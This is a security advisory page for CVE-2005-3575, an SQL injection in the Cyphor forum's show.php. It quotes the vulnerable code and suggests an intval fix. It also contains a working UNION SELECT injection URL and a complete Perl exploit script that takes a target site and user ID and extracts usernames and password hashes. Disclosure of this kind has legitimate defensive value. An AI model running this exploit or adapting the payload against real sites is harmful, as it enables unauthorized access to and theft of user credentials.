|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 180 CVE : CVE-2005-3575 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : HACKERS PAL Published : 15.11.2005
Advisory Content : Hello This is sql injection in cyphor Discovered by : HACKERS PAL Greets For Devil-00 - Abducter - Almaster -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- injected vresions :- Cyphor (Release: 0.19) and all Versions Up To now -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- injected File show.php -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- injection code :- show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,passwo rd,null,null,null%20from%20users%20where%20id=1 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Discovering the vul :- searching in show.php file in line 59 to 62 as below [/code] if ($id) { // a message with id=$id will be displayed $message_mode = 1; $query = "SELECT * FROM $db_table_name WHERE id=$id"; [/code] The Programmed Didont Check The $id Variable .. if it was integer -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- How to protect :- after $message_mode = 1; add // Script Protection By : HACKERS PAL $id=intval($id); if(!$id) { die("<br>We Dont allow Skript Kidz .. <br> By <a hre='Http://www.sqor.net'>HACKERS PAL</a>"); } // !/script Porotection By : HACKERS PAL fINISHED -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- exploit :- #!/bin/env perl #//-----------------------------------------------------------# #// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL #// Greets For Devil-00 - Abducter - Almaster #// http://WwW.SoQoR.NeT #//-----------------------------------------------------------# use LWP::Simple; print "\n#####################################################"; print "\n# Cyphor Forum Exploit By : HACKERS PAL #"; print "\n# Http://WwW.SoQoR.NeT #"; if(!$ARGV[0]||!$ARGV[1]) { print "\n# -- Usage: #"; print "\n# -- perl $0 [Full-Path] 1 #"; print "\n# -- Example: #"; print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#"; print "\n# Greets To Devil-00 - Abducter - almastar #"; print "\n#####################################################\n"; exit(0); } else { print "\n# Greets To Devil-00 - Abducter - almastar #"; print "\n#####################################################\n"; $web=$ARGV[0]; $id=$ARGV[1]; $url = "show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10% 20from%20users%20where%20id=$id"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; print "\n[+] Connected to: $ARGV[0]\n"; print "[+] User ID is : $id "; $page =~ m/<span class=bigh>(.*?)<\/span>/ && print "\n[+] User Name is: $1\n"; print "\n[-] Unable to retrieve User Name\n" if(!$1); $page =~ m/<span class=message>(.*?)<\/span>/ && print "[+] Hash of password is: $1\n"; print "[-] Unable to retrieve hash of password\n" if(!$1); } print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n"; #finished  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |